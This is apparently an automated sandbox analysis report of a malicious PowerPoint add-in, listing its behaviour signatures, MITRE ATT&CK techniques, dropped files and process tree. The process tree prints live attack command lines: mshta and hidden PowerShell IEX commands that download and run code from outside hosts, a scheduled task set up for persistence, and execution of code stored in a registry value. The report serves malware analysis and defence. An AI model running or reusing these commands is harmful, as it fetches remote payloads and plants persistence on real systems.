Analysis

  • max time kernel
    150s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    17-07-2021 09:44

General

  • Target

    SO-19844 EIDCO.ppam

  • Size

    14KB

  • MD5

    24dd86688a277a16ca013809c71ab8c0

  • SHA1

    d3a1915ced9501a7ce269ee1ace23b4a50c8c5cd

  • SHA256

    643ce9630631fdc9051b4be5b3bd9d60281885380fb2fa777379711d938c3c91

  • SHA512

    89888f15eaacf0404e460830f497b2465bbaf75276e5cf5b0ae7420f50f9c00c4392479bb2cee291acbeefda71e4dd4d603b915244ed932d84608f8fc65b5119

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 16 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\SO-19844 EIDCO.ppam"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:1208
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1720
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://www.bitly.com/ashjdkqodasdasdasdwdhqowdh
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:564
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""BlueStacks"" /F /tr ""\""MsHtA""\""http://1230948%1230948@0v2x.blogspot.com/p/34.html\""
          3⤵
          • Creates scheduled task(s)
          PID:1992
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601408.us.archive.org/12/items/psteric/psteric.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601408.us.archive.org/12/items/psteric/1.txt').GetResponse().GetResponseStream()).ReadToend());
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe ((gp HKCU:\Software).cookerr)|IEX
      1⤵
      • Process spawned unexpected child process
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1440

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      MD5

      2902de11e30dcc620b184e3bb0f0c1cb

      SHA1

      5d11d14a2558801a2688dc2d6dfad39ac294f222

      SHA256

      e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

      SHA512

      efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      MD5

      e55e4637ac0072ecdc11f3b3498b9865

      SHA1

      a87816068ba10a53bdadc163e764791ce58045af

      SHA256

      ec6f25b85467c373490225465a27f476e8e341f65ca3a9f37eb7f22df4c90260

      SHA512

      75c173b34a9ddc58869292cd910419e3066c0b9390dd74436bc82120e57a599346318d901057e385a0560e2173bd9887b68b418becc30b140776235f426d5b7c

    • memory/564-66-0x0000000000000000-mapping.dmp
    • memory/680-77-0x0000000002310000-0x0000000002311000-memory.dmp
      Filesize

      4KB

    • memory/680-83-0x00000000052C0000-0x00000000052C1000-memory.dmp
      Filesize

      4KB

    • memory/680-82-0x00000000049B2000-0x00000000049B3000-memory.dmp
      Filesize

      4KB

    • memory/680-81-0x00000000049B0000-0x00000000049B1000-memory.dmp
      Filesize

      4KB

    • memory/680-80-0x0000000002650000-0x0000000002651000-memory.dmp
      Filesize

      4KB

    • memory/680-70-0x0000000000000000-mapping.dmp
    • memory/680-78-0x00000000049F0000-0x00000000049F1000-memory.dmp
      Filesize

      4KB

    • memory/1208-67-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1208-60-0x00000000748B1000-0x00000000748B5000-memory.dmp
      Filesize

      16KB

    • memory/1208-61-0x0000000071941000-0x0000000071943000-memory.dmp
      Filesize

      8KB

    • memory/1208-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1208-64-0x0000000076281000-0x0000000076283000-memory.dmp
      Filesize

      8KB

    • memory/1440-85-0x000000001C3E0000-0x000000001C3E1000-memory.dmp
      Filesize

      4KB

    • memory/1440-74-0x000000001A9E0000-0x000000001A9E2000-memory.dmp
      Filesize

      8KB

    • memory/1440-79-0x00000000023D0000-0x00000000023D1000-memory.dmp
      Filesize

      4KB

    • memory/1440-71-0x0000000002290000-0x0000000002291000-memory.dmp
      Filesize

      4KB

    • memory/1440-104-0x000000001B440000-0x000000001B441000-memory.dmp
      Filesize

      4KB

    • memory/1440-75-0x000000001A9E4000-0x000000001A9E6000-memory.dmp
      Filesize

      8KB

    • memory/1440-103-0x0000000002700000-0x0000000002701000-memory.dmp
      Filesize

      4KB

    • memory/1440-84-0x000000001C350000-0x000000001C351000-memory.dmp
      Filesize

      4KB

    • memory/1440-72-0x000000001AA60000-0x000000001AA61000-memory.dmp
      Filesize

      4KB

    • memory/1440-76-0x00000000024E0000-0x00000000024E1000-memory.dmp
      Filesize

      4KB

    • memory/1440-91-0x000000001A9A0000-0x000000001A9A1000-memory.dmp
      Filesize

      4KB

    • memory/1440-88-0x00000000025C0000-0x00000000025C1000-memory.dmp
      Filesize

      4KB

    • memory/1720-63-0x0000000000000000-mapping.dmp
    • memory/1720-65-0x000007FEFC141000-0x000007FEFC143000-memory.dmp
      Filesize

      8KB

    • memory/1992-69-0x0000000000000000-mapping.dmp